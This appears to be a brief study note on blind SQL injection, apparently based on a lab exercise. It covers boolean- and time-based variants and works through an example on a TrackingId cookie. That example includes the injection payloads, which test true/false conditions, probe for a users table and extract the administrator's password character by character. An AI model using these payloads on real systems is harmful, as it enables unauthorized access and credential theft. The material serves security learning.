Blind SQL injection
Occur when no SQL message returned
Condition
Categorized into :
Boolean Based Attack
TRUE OR FALSE
(GET DIFFERENT RESULT/PAGE CONTENT)
TIME BASED ATTACK
SLEEP
Cons
UNION
will not work : cannot see the results of the injected query
Boolean Based Attack Example :
Intercepted Request
Cookie: TrackingId=u5YD3PapBcR4lN3e7Tj4
Backend Processing
SELECT TrackingId FROM TrackedUsers WHERE TrackingId = 'u5YD3PapBcR4lN3e7Tj4'
TrackingId
is used to check if user is authenticated
Note : If the sql statement is true , we get 'Welcome Back' which doesn't return any sql result because its processed in backend
Payload Testing
TrackingId=u5YD3PapBcR4lN3e7Tj4' AND '1'='1 # Will return True
TrackingId=u5YD3PapBcR4lN3e7Tj4' AND '1'='2 # Will return False
Checking SQL user table existence
TrackingId=u5YD3PapBcR4lN3e7Tj4' AND (SELECT 'a' FROM users LIMIT 1)='a
Exploitation Delivery
TrackingId=u5YD3PapBcR4lN3e7Tj4' AND (SELECT SUBSTRING(password,§1§,1) FROM users WHERE username='administrator')='§a§
2
comparing second character of the password , 1
only one character if "Welcome Back" is returned it means the position of the password matches
Last updated
Was this helpful?